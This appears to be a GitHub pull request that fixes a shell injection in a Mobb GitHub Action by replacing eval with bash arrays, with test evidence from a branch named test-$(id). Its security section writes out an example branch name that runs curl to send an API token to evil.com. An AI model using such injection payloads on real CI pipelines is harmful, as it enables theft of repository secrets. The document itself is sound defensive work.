fix: prevent shell injection via eval in action.yml and review/action.yml [E-1815]

[jonathansantilli]

Summary

Fixes command injection (CWE-78) in both action.yml and review/action.yml:

• Remove eval $MobbExecString — replace with bash array execution
• Move all ${{ inputs.* }} from run: blocks to env: blocks
• Remove echo "Mobb Command: ..." that printed api-key and github-token to logs
• Replace bash -l {0} with bash
• Quote all variable expansions (including $GITHUB_HEAD_REF)
• Pin all action references to immutable commit SHAs
• Extract URL from mobbdev CLI output to fix github-status-action

Security Context

review/action.yml builds a command string containing $GITHUB_HEAD_REF (the PR branch name) and secrets, then executes it via eval. A malicious branch name like test-$(curl${IFS}evil.com/${MOBB_API_TOKEN}) causes the eval to execute the embedded command, exfiltrating the Mobb API token.

This affects all 12 Mobb-Fixer-Demo repos that consume mobb-dev/action/review@v1.1.

The fix replaces eval with direct command execution using a bash array, and moves all secrets to env: blocks where bash treats them as data.

Consumer Impact

None. The action inputs: and outputs: are unchanged. This fix is transparent to all consumers.

Test plan

• Create a branch named test-$(id) and open a PR to verify the injection no longer executes — PASSED (PR TEST: verify shell injection is blocked with branch name test-$(id) #32, no uid= in logs)
• Run a normal workflow to verify Mobb review still generates fixes — PASSED
• Run a normal workflow to verify Mobb analyze still generates fixes — PASSED
• Verify fix-report-url output is set correctly — PASSED (valid Mobb URL extracted)
• Check workflow logs to confirm no secrets are printed — PASSED (api-key masked as ***)

[jonathansantilli]

Injection Test Evidence

To verify the shell injection fix, a branch named test-$(id) was pushed and a PR opened (#32, now closed).

How to verify

1. Open the test workflow run: https://github.com/mobb-dev/action/actions/runs/24088193749/job/70266919477
2. Click "Mobb action step" to expand it
3. Look for these lines:

Line showing the branch name is passed as a quoted variable (safe):

BRANCH=${GITHUB_HEAD_REF:-${GITHUB_REF#refs/heads/}}
...
--ref "$BRANCH"

What you should NOT see (would mean injection succeeded):

uid=1001(runner) gid=1001(runner) groups=1001(runner)

What you DO see (Mobb ran normally, no injection):

✔ Vulnerability report processed successfully
🕵️‍♂️ Generating fixes...
Mobb URL: https://app.mobb.ai/.../report/11a0e5f6-...

Why this proves the fix works

If the old code (eval $MobbExecString with unquoted $GITHUB_HEAD_REF) were still present, the branch name test-$(id) would cause bash to execute id, and its output (uid=1001(runner)...) would appear in the logs and corrupt the --ref argument.

Instead, the branch name was treated as literal text, the Mobb CLI received it as a normal --ref value, and the workflow completed successfully with a valid fix URL.

[jonathansantilli]

Updated Injection Test Evidence

Re-ran the test with added echo "BRANCH: $BRANCH" so the branch name value is visible in logs.

Direct link

Workflow run: https://github.com/mobb-dev/action/actions/runs/24089287238/job/70270851010
→ Expand "Mobb action step"

What the log shows

REPO: https://github.com/mobb-dev/action
BRANCH: test-$(id)

The branch name test-$(id) appears as literal text. Bash did not execute $(id).

What it would show if the vulnerability existed

BRANCH: test-uid=1001(runner) gid=1001(runner) groups=1001(runner)

Conclusion

The fix is verified. Branch names containing shell metacharacters are treated as data, not code.

[github-actions]

No security issues were found ✅

Awesome! No vulnerabilities were found by CodeQL in the changes made as part of this PR.
Please notice there are issues in this repo that are unrelated to this PR.